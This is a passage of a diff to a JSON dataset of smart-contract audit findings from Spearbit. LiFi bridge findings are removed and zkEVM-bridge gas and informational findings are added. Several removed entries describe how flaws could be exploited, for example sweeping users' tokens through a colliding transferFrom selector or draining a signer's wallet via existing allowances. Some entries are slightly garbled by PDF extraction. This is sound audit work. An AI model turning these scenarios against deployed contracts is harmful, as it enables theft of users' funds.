currentSwapData); } } Based on the comments of the LiFi project there is also the use case to call more generic contracts, which do not return any token, e.g., NFT buy, carbon offset. It probably better to create new functionality to do this.", + "title": "Optimize isForceBatchAllowed()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The modifier isForceBatchAllowed() includes a redundant check == true. This can be optimized to save some gas.
modifier isForceBatchAllowed() { require(forceBatchAllowed == true, ... ); _; }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Processing of end balances", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The contract SwapperV2 has the following construction (twice) to prevent using any already start balance. it gets a start balance. does an action. if the end balance > start balance. then it uses the difference. else (which includes start balance == end balance) it uses the end balance. So if the else clause it reached it uses the end balance and ignores any start balance. If the action hasnt changed the balances then start balance == end balance and this amount is used. When the action has lowered the balances then end balance is also used. This defeats the codes purpose. Note: normally there shouldnt be any tokens in the LiFi Diamond contract so the risk is limited. Note Swapper.sol has similar code. contract SwapperV2 is ILiFi { modifier noLeftovers(LibSwap.SwapData[] calldata _swapData, address payable _receiver) { ... uint256[] memory initialBalances = _fetchBalances(_swapData); ... // all kinds of actions newBalance = LibAsset.getOwnBalance(curAsset); curBalance = newBalance > initialBalances[i] ? newBalance - initialBalances[i] : newBalance; ... } function _executeAndCheckSwaps(...) ... { ... uint256 swapBalance = LibAsset.getOwnBalance(finalTokenId); ... // all kinds of actions uint256 newBalance = LibAsset.getOwnBalance(finalTokenId); swapBalance = newBalance > swapBalance ? newBalance - swapBalance : newBalance; ... }", + "title": "Optimize loop in _updateBatchFee()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function _updateBatchFee() uses the following check in a loop: block.timestamp - currentSequencedBatchData.sequencedTimestamp > verifyBatchTimeTarget. This is the same as: block.timestamp - verifyBatchTimeTarget > currentSequencedBatchData.sequencedTimestamp. As block.timestamp - verifyBatchTimeTarget is constant during the execution of this function, it can be taken outside the loop to save some gas. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... while (currentBatch != currentLastVerifiedBatch) { ... if ( block.timestamp - currentSequencedBatchData.sequencedTimestamp > verifyBatchTimeTarget ) { ... } } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Processing of initial balances", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The LiFi code bases contains two similar source files: Swapper.sol and SwapperV2.sol. One of the differences is the processing of msg.value for native tokens, see pieces of code below. The implementation of SwapperV2.sol sends previously available native token to the msg.sender. The following is exploit example. Assume that: the LiFi Diamond contract contains 0.1 ETH. a call is done with msg.value == 1 ETH. and _swapData[0].fromAmount ETH, which is the amount to be swapped. Option 1Swapper.sol: initialBalances == 1.1 ETH - 1 ETH == 0.1 ETH. Option 2 SwapperV2.sol: initialBalances == 1.1 ETH. After the swap getOwnBalance()is1.1 - 0.5 == 0.6 ETH. Option 1 Swapper.sol: returns 0.6 - 0.1 = 0.5 ETH.
Option 2 SwapperV2.sol: returns 0.6 ETH (so includes the previously present ETH). 0.5 == Note: the implementations of noLeftovers() are also different in Swapper.sol and SwapperV2.sol. Note: this is also related to the issue \"Pulling tokens by LibSwap.swap() is counterintuitive\", because the ERC20 are pulled in via LibSwap.swap(), whereas the msg.value is directly added to the balance. As there normally shouldnt be any token in the LiFi Diamond contract the risk is limited. contract Swapper is ILiFi { function _fetchBalances(...) ... { ... for (uint256 i = 0; i < length; i++) { address asset = _swapData[i].receivingAssetId; uint256 balance = LibAsset.getOwnBalance(asset); if (LibAsset.isNativeAsset(asset)) { balances[i] = balance - msg.value; } else { balances[i] = balance; } } return balances; } } contract SwapperV2 is ILiFi { function _fetchBalances(...) ... { ... for (uint256 i = 0; i < length; i++) { balances[i] = LibAsset.getOwnBalance(_swapData[i].receivingAssetId); } ... } } The following functions do a comparable processing of msg.value for the initial balance: swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol swapAndCompleteBridgeTokens() of XChainExecFacet 25 if (!LibAsset.isNativeAsset(transferredAssetId)) { ... } else { startingBalance = LibAsset.getOwnBalance(transferredAssetId) - msg.value; } However in Executor.sol function swapAndCompleteBridgeTokensViaStargate() isnt optimal for ERC20 tokens because ERC20 tokens are already deposited in the contract before calling this function. function swapAndCompleteBridgeTokensViaStargate(... ) ... { ... if (!LibAsset.isNativeAsset(transferredAssetId)) { startingBalance = LibAsset.getOwnBalance(transferredAssetId); // doesn't correct for initial balance } else { ... } ,! } So assume: 0.1 ETH was in the contract. 1 ETH was added by the bridge. 0.5 ETH is swapped. Then the StartingBalance is calculated to be 0.1 ETH + 1 ETH == 1.1 ETH. So no funds are returned to the receiver as the end balance is 1.1 ETH - 0.5 ETH == 0.6 ETH, is smaller than 1.1 ETH. Whereas this should have been (1.1 ETH - 0.5 ETH) - 0.1 ETH == 0.5 ETH.", + "title": "Optimize multiplication", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The multiplication in function _updateBatchFee can be optimized to save some gas.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Improve dexAllowlist", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The functions _executeSwaps() of both SwapperV2.sol and Swapper.sol use a whitelist to make sure the right functions in the allowed dexes are called. The checks for approveTo, callTo and signature (callData) are independent. This means that any signature is valid for any dex combined with any approveTo address. This grands more access than necessary. This is important because multiple functions can have the same signature. For example these two functions have the same signature: gasprice_bit_ether(int128) 26 transferFrom(address,address,uint256) See bytes4_signature=0x23b872dd Note: brute forcing an innocent looking function is straightforward The transferFrom() is especially dangerous because it allows sweeping tokens from other users that have set an allowance for the LiFi Diamond. 
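The loop-invariant hoist proposed in "Optimize loop in _updateBatchFee()" can be sketched as follows. The struct fields and mapping are assumed from the excerpts in this report; the fee-accumulation body itself is elided:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Sketch: compute block.timestamp - verifyBatchTimeTarget once, outside
// the loop, and compare each batch's timestamp against the cached limit.
contract BatchLoopSketch {
    struct SequencedBatchData {
        bytes32 accInputHash;
        uint64 sequencedTimestamp;
        uint64 previousLastBatchSequenced; // assumption: back-pointer per batch
    }

    mapping(uint64 => SequencedBatchData) public sequencedBatches;
    uint64 public verifyBatchTimeTarget = 30 minutes;

    function _countBatchesAboveTarget(
        uint64 currentBatch,
        uint64 currentLastVerifiedBatch
    ) internal view returns (uint256 totalBatchesAboveTarget) {
        // Invariant during this call; computed once instead of per iteration.
        uint256 limitTimestamp = block.timestamp - verifyBatchTimeTarget;
        while (currentBatch != currentLastVerifiedBatch) {
            SequencedBatchData storage data = sequencedBatches[currentBatch];
            // Equivalent to:
            // block.timestamp - data.sequencedTimestamp > verifyBatchTimeTarget
            if (data.sequencedTimestamp < limitTimestamp) {
                totalBatchesAboveTarget++;
            }
            currentBatch = data.previousLastBatchSequenced;
        }
    }
}
```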
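Similarly, the "Move initialization values from initialize() to immutable via constructor" finding boils down to a small pattern. Note that with a proxy setup the value must be known when the implementation is deployed, since immutables are baked into the implementation bytecode; this caveat is an observation, not part of the report:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Sketch: networkID set once in the constructor as an immutable, replacing
// the storage variable written in initialize().
contract NetworkIDSketch {
    uint32 public immutable networkID;

    constructor(uint32 _networkID) {
        networkID = _networkID; // read later from code, not from storage
    }
}
```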
If someone gets a dex whitelisted, which contains a function with the same signature then this can be abused in the current code. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); ... } }", + "title": "Changing constant storage variables from public to private will save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Usually constant variables are not expected to be read on-chain and their value can easily be seen by looking at the source code. For this reason, there is no point in using public for a constant variable since it auto-generates a getter function which increases deployment cost and sometimes function call cost.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Pulling tokens by LibSwap.swap() is counterintuitive", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function LibSwap.swap() pulls in tokens via transferFromERC20() from msg.sender when needed. When put in a loop, via _executeSwaps(), it can pull in multiple different tokens. It also doesnt detect accidentally sending of native tokens with ERC20 tokens. This approach is counterintuitive and leads to risks. Suppose someone wants to swap 100 USDC to 100 DAI and then 100 DAI to 100 USDT. If the first swap somehow gives back less tokens, for example 90 DAI, then LibSwap.swap() pulls in 10 extra DAI from msg.sender. Note: this requires the msg.sender having given multiple allowances to the LiFi Diamond. Another risk is that an attacker tricks a user to sign a transaction for the LiFi protocol. Within one transaction it can sweep multiple tokens from the user, cleaning out his entire wallet. Note: this requires the msg.sender having given multiple allowances to the LiFi Diamond. In Executor.sol the tokens are already deposited, so the \"pull\" functionality is not needed and can even result in additional issues. In Executor.sol it tries to \"pull\" tokens from \"msg.sender\" itself. In the best case of ERC20 implementations (like OpenZeppeling, Solmate) this has no effect. However some non standard ERC20 imple- mentations might break. 27 contract SwapperV2 is ILiFi { function _executeSwaps(...) ... { ... for (uint256 i = 0; i < _swapData.length; i++) { ... LibSwap.swap(_lifiData.transactionId, currentSwapData); } } } library LibSwap { function swap(...) ... { ... uint256 initialSendingAssetBalance = LibAsset.getOwnBalance(fromAssetId); ... uint256 toDeposit = initialSendingAssetBalance < fromAmount ? fromAmount - ,! initialSendingAssetBalance : 0; ... 
if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } } Use LibAsset.depositAsset() before doing", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Too many bytes are checked to verify the function selector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function _executeSwaps() slices the callData with 8 bytes. The function selector is only 4 bytes. Also see docs So additional bytes are checked unnecessarily, which is probably unwanted. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) // should be 4 ) revert ContractCallNotAllowed(); ... } } Definition of dexFuncSignatureAllowList in LibStorage.sol: struct LibStorage { ... mapping(bytes32 => bool) dexFuncSignatureAllowList; ... // could be bytes4 }", + "title": "Optimize check in _consolidatePendingState()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The check in function _consolidatePendingState() can be optimized to save some gas. As lastPendingStateConsolidated is of type uint64 and thus is at least 0, the check pendingStateNum > lastPendingStateConsolidated makes sure pendingStateNum > 0. So the explicit check for pendingStateNum != 0 isn't necessary. uint64 public lastPendingStateConsolidated; function _consolidatePendingState(uint64 pendingStateNum) internal { require( pendingStateNum != 0 && pendingStateNum > lastPendingStateConsolidated && pendingStateNum <= lastPendingState, \"PolygonZkEVM::_consolidatePendingState: pendingStateNum invalid\" ); ...
} }", + "title": "Custom errors not used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Custom errors lead to cheaper deployment and run-time costs.", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Verify anyswap token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The AnyswapFacet supplies _anyswapData.token to different functions of _anyswapData.router. These functions interact with the contract behind _anyswapData.token. If the _anyswapData.token would be malicious then tokens can be stolen. Note, this is relevant if the LiFi contract are called directly without using the API. 30 function _startBridge(...) ... { ... IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }( _anyswapData.token,...); ... IAnyswapRouter(_anyswapData.router).anySwapOutUnderlying( _anyswapData.token, ... ); ... IAnyswapRouter(_anyswapData.router).anySwapOut( _anyswapData.token, ...); ... ,! }", + "title": "Variable can be updated only once instead of on each iteration of a loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "In functions sequenceBatches() and sequenceForceBatches(), the currentBatchSequenced vari- able is increased by 1 on each iteration of the loop but is not used inside of it. This means that instead of doing batchesNum addition operations, you can do it only once, after the loop.", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "More thorough checks for DAI in swapAndStartBridgeTokensViaXDaiBridge()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function swapAndStartBridgeTokensViaXDaiBridge() checks lifiData.sendingAssetId == DAI, however it doesnt check that the result of the swap is DAI (e.g. _swapData[_swapData.length - 1].re- ceivingAssetId == DAI ). function swapAndStartBridgeTokensViaXDaiBridge(...) ... { ... if (lifiData.sendingAssetId != DAI) { revert InvalidSendingToken(); } gnosisBridgeData.amount = _executeAndCheckSwaps(lifiData, swapData, payable(msg.sender)); ... _startBridge(gnosisBridgeData); // sends DAI }", + "title": "Optimize emits in sequenceBatches() and sequenceForceBatches()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The emits in functions sequenceBatches() and sequenceForceBatches() could be gas optimized by using the tmp variables which have been just been stored in the emited global variables. function sequenceBatches(...) ... { ... lastBatchSequenced = currentBatchSequenced; ... emit SequenceBatches(lastBatchSequenced); } function sequenceForceBatches(...) ... { ... lastBatchSequenced = currentBatchSequenced; ... emit SequenceForceBatches(lastBatchSequenced); }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Funds transferred via Connext may be lost on destination due to incorrect receiver or calldata", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "_startBridge() in AmarokFacet.sol and NXTPFacet.sol sets user-provided receiver and call data for the destination chain. 
The receiver is intended to be the LifiDiamond contract address on the destination chain. The call data is intended such that the functions completeBridgeTokensVia{Amarok/NXTP}() or swapAndCompleteBridgeTokensVia{Amarok/NXTP}() are called. In case of a frontend bug or a user error, these parameters can be malformed, which will lead to stuck (and stolen) funds on the destination chain. Since the addresses and functions are already known, the contract can pass this data to Connext itself instead of taking it from the user.", + "title": "Only update lastForceBatchSequenced if necessary in function sequenceBatches()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function sequenceBatches() writes back to lastForceBatchSequenced, however this is only necessary if there are forced batches. This could be optimized to save some gas and at the same time the calculation of nonForcedBatchesSequenced could also be optimized. function sequenceBatches(...) ... { ... uint64 currentLastForceBatchSequenced = lastForceBatchSequenced; ... if (currentBatch.minForcedTimestamp > 0) { currentLastForceBatchSequenced++; ... uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - lastForceBatchSequenced); ... lastForceBatchSequenced = currentLastForceBatchSequenced; ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Check output of swap is equal to amount bridged", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The result of the swap (amount) isn't always checked to be the same as the bridged amount (_bridgeData.amount). This way tokens could stay in the LiFi Diamond if more tokens are received with a swap than bridged. function swapAndStartBridgeTokensViaPolygonBridge(...) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); ... _startBridge(_lifiData, _bridgeData, true); } function _startBridge(..., BridgeData calldata _bridgeData, ...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { rootChainManager.depositEtherFor{ value: _bridgeData.amount }(_bridgeData.receiver); } else { ... LibAsset.maxApproveERC20(IERC20(_bridgeData.assetId), _bridgeData.erc20Predicate, _bridgeData.amount); bytes memory depositData = abi.encode(_bridgeData.amount); rootChainManager.depositFor(_bridgeData.receiver, _bridgeData.assetId, depositData); } ... }", + "title": "Delete forcedBatches[currentLastForceBatchSequenced] after use", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The functions sequenceBatches() and sequenceForceBatches() use up the forcedBatches[] entries, which are afterward no longer used. Deleting these values might give a gas refund and lower the L1 gas costs. function sequenceBatches(...) ... { ... currentLastForceBatchSequenced++; ... require(hashedForcedBatchData == ... forcedBatches[currentLastForceBatchSequenced],...); } function sequenceForceBatches(...) ... { ... currentLastForceBatchSequenced++; ... require(hashedForcedBatchData == forcedBatches[currentLastForceBatchSequenced],...); ... 
}", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Missing timelock logic on the DiamondCut facets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In LiFi Diamond, any facet address/function selector can be changed by the contract owner. Connext, Diamond should go through a proposal window with a delay of 7 days. In function diamondCut( FacetCut[] calldata _diamondCut, address _init, bytes calldata _calldata ) external override { LibDiamond.enforceIsContractOwner(); LibDiamond.diamondCut(_diamondCut, _init, _calldata); }", + "title": "Calculate keccak256(currentBatch.transactions) once", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "cak256(currentBatch.transactions) twice. calculating the keccak256() of it could be relatively expensive. sequenceBatches() functions Both kec- sequenceForceBatches() As the currentBatch.transactions could be rather large, calculate and function sequenceBatches(BatchData[] memory batches) ... { ... if (currentBatch.minForcedTimestamp > 0) { ... bytes32 hashedForcedBatchData = ... keccak256(currentBatch.transactions) ... ... } ... currentAccInputHash = ... keccak256(currentBatch.transactions) ... ... } function sequenceForceBatches(ForcedBatchData[] memory batches) ... { ... bytes32 hashedForcedBatchData = ... keccak256(currentBatch.transactions) ... ... currentAccInputHash = ... keccak256(currentBatch.transactions) ... ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Data from emit LiFiTransferStarted() cant be relied on", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Most of the function do an emit like LiFiTransferStarted(). Some of the fields of the emits are (sometimes) verified, but most fields come from the input variable _lifiData. The problem with this is that anyone can do solidity transactions to the LiFi bridge and supply wrong data for the emit. For example: transfer a lot of Doge coins and in the emit say they are transferring wrapped BTC. Then the statistics would say a large amount of volume has been transferred, while in reality it is neglectable. The advantage of using a blockchain is that the data is (seen as) reliable. If the data isnt reliable, it isnt worth the trouble (gas cost) to store it in a blockchain and it could just be stored in an offline database. The result of this is, its not useful to create a subgraph on the emit data (because it is unreliable). This would mean a lot of extra work for subgraph builders to reverse engineer what is going on. Also any kickback fees to in- tegrators or referrers cannot be based on this data because it is unreliable. Also user interfaces & dashboards could display the wrong information. 33 function startBridgeTokensViaOmniBridge(LiFiData calldata _lifiData, ...) ... { ... LibAsset.depositAsset(_bridgeData.assetId, _bridgeData.amount); _startBridge(_lifiData, _bridgeData, _bridgeData.amount, false); } function _startBridge(LiFiData calldata _lifiData, ... ) ... { ... 
// do actions emit LiFiTransferStarted( _lifiData.transactionId, \"omni\", \"\", _lifiData.integrator, _lifiData.referrer, _lifiData.sendingAssetId, _lifiData.receivingAssetId, _lifiData.receiver, _lifiData.amount, _lifiData.destinationChainId, _hasSourceSwap, false ); }", + "title": "Function definition of onMessageReceived()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "As discovered by the project: the function definition of onMessageReceived() is view and returns a boolean. Also, it is not payable. The function is meant to receive ETH so it should be payable. Also, it is meant to take action so it shouldn't be view. The bool return value isn't used in PolygonZkEVMBridge so isn't necessary. Because the function is called via a low-level call this doesn't pose a problem in practice. The current definition is confusing though. interface IBridgeMessageReceiver { function onMessageReceived(...) external view returns (bool); } contract PolygonZkEVMBridge is ... { function claimMessage( ... ) ... { ... (bool success, ) = destinationAddress.call{value: amount}( abi.encodeCall( IBridgeMessageReceiver.onMessageReceived, (originAddress, originNetwork, metadata) ) ); require(success, \"PolygonZkEVMBridge::claimMessage: Message failed\"); ... } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Missing emit in XChainExecFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function swapAndCompleteBridgeTokens of Executor does do an emit LiFiTransferCompleted, while the comparable function in XChainExecFacet doesn't do this emit. This way there will be missing emits. contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function swapAndCompleteBridgeTokens(LiFiData calldata _lifiData, ... ) ... { ... emit LiFiTransferCompleted( ... ); } } contract XChainExecFacet is SwapperV2, ReentrancyGuard { function swapAndCompleteBridgeTokens(LiFiData calldata _lifiData, ... ) ... { ... // no emit } }", + "title": "batchesNum can be explicitly cast in sequenceForceBatches()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The sequenceForceBatches() function performs a check to ensure that the sequencer does not sequence forced batches that do not exist. The require statement compares two different types: uint256 and uint64. For consistency, the uint256 can be safely cast down to uint64 as Solidity 0.8.0 checks for overflow/underflow.", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Different access control to withdraw funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "To withdraw any stuck tokens, WithdrawFacet.sol provides two functions: executeCallAndWithdraw() and withdraw(). Both have different access controls on them. executeCallAndWithdraw() can be called by the owner or if msg.sender has been approved to call a function whose signature matches that of executeCallAndWithdraw(). withdraw() can only be called by the owner. 
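To illustrate the onMessageReceived() definition finding above, a sketch of how the corrected interface could look; the parameter names are taken from the quoted claimMessage() call, but the exact parameter types here are assumptions:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

interface IBridgeMessageReceiver {
    // payable: the hook is meant to receive ETH;
    // not view: it is meant to take action;
    // no bool return: the value was unused by the bridge anyway
    function onMessageReceived(
        address originAddress,
        uint32 originNetwork,
        bytes calldata metadata
    ) external payable;
}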
If the function signature of executeCallAndWithdraw() clashes with an approved signature in the execAccess mapping, the approved address can steal all the funds in the LifiDiamond contract.", + "title": "Metadata are not migrated on changes in L1 contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "If metadata changes on mainnet (say a decimals change) after wrapped token creation, the wrapped token's metadata will not change and would point to the older decimals: 1. Token T1 was on mainnet with decimals 18. 2. This was bridged to rollup R1. 3. A wrapped token is created with decimals 18. 4. On mainnet T1 decimals are changed to 6. 5. Wrapped token on R1 still uses 18 decimals.", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Use internal where possible", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Several functions have an access control where the msg.sender is compared to address(this), which means they can only be called from the same contract. In the current code with the various generic call mechanisms this isn't a safe check. For example the function _execute() from Executor.sol can circumvent this check. Luckily the functions where this has been used have a low risk profile, so the risk of this issue is limited. function swapAndCompleteBridgeTokensViaStargate(...) ... { if (msg.sender != address(this)) { revert InvalidCaller(); } ... }", + "title": "Remove unused import in PolygonZkEVMGlobalExitRootL2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The contract PolygonZkEVMGlobalExitRootL2 imports SafeERC20.sol, however, this isn't used in the contract. import \"@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol\"; contract PolygonZkEVMGlobalExitRootL2 { }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Event of transfer is not emitted in the AxelarFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The usage of the LiFi protocol depends largely on the off-chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs. The events are useful to record these changes on-chain for off-chain monitors/tools/interfaces when integrating with off-chain APIs. Although other facets emit the LiFiTransferStarted event, AxelarFacet does not emit this event. contract AxelarFacet { function executeCallViaAxelar(...) ... {} function executeCallWithTokenViaAxelar(...) ... {} } On the receiving side, the Executor contract does do an emit in function _execute() but not in function _executeWithToken(). contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _execute(...) ... { ... emit AxelarExecutionComplete(callTo, bytes4(callData)); } function _executeWithToken( ... // no emit } }", + "title": "Switch from public to external for all non-internally called methods", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Functions that are not called from inside of the contract should be external instead of public, which prevents accidentally using a function internally that is meant to be used externally. 
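A minimal, hypothetical illustration of the public-to-external recommendation above (not the audited code):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract Example {
    bytes32 private root;

    // external instead of public: the function is only called from outside,
    // so external documents the intent and prevents accidental internal use
    function getRoot() external view returns (bytes32) {
        return root;
    }
}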
See also issue \"Use calldata instead of memory for function parameters\".", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Improve checks on the facets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In the facets, receiver/destination address and amount checks are missing. The symbol parameter is used to get the address of the token with the gateway's tokenAddresses function. The tokenAddresses function gets the token address from a mapping. If the symbol does not exist, the token address can be zero. AxelarFacet and Executor do not check if the given symbol exists. contract AxelarFacet { function executeCallWithTokenViaAxelar(...) ... { address tokenAddress = s.gateway.tokenAddresses(symbol); } function initAxelar(address _gateway, address _gasReceiver) external { s.gateway = IAxelarGateway(_gateway); s.gasReceiver = IAxelarGasService(_gasReceiver); } } contract Executor { function _executeWithToken(...) ... { address tokenAddress = s.gateway.tokenAddresses(symbol); } } GnosisBridgeFacet, CBridgeFacet, HopFacet and HyphenFacet are missing receiver address/amount checks. contract CBridgeFacet { function _startBridge(...) ... { ... _cBridgeData.receiver ... } } contract GnosisBridgeFacet { function _startBridge(...) ... { ... gnosisBridgeData.receiver ... } } contract HopFacet { function _startBridge(...) ... { _hopData.recipient, ... ... } } contract HyphenFacet { function _startBridge(...) ... { _hyphenData.recipient ... ... } }", + "title": "Common interface for PolygonZkEVMGlobalExitRoot and PolygonZkEVMGlobalExitRootL2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The contract PolygonZkEVMGlobalExitRoot inherits from IPolygonZkEVMGlobalExitRoot, while PolygonZkEVMGlobalExitRootL2 doesn't, although they both implement a similar interface. Note: PolygonZkEVMGlobalExitRoot implements an extra function getLastGlobalExitRoot(). Inheriting from the same interface file would improve the checks by the compiler. import \"@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol\"; contract PolygonZkEVMGlobalExitRoot is IPolygonZkEVMGlobalExitRoot, ... { ... } contract PolygonZkEVMGlobalExitRootL2 { }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Use keccak256() instead of hex", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Several NAMESPACEs are defined, some with a hex value and some with a keccak256(). To be able to verify they are all different it is better to use the same format everywhere. If they would use the same value then the variables stored on that location could interfere with each other and the LiFi Diamond could start to behave unreliably. ReentrancyGuard.sol: NAMESPACE = hex\"a6...\"; AxelarFacet.sol: NAMESPACE = hex\"c7...\"; // keccak256(\"com.lifi.facets.axelar\") OwnershipFacet.sol: NAMESPACE = hex\"cf...\"; // keccak256(\"com.lifi.facets.ownership\"); PeripheryRegistryFacet.sol: NAMESPACE = hex\"dd...\"; // keccak256(\"com.lifi.facets.periphery_registry\"); StargateFacet.sol: 
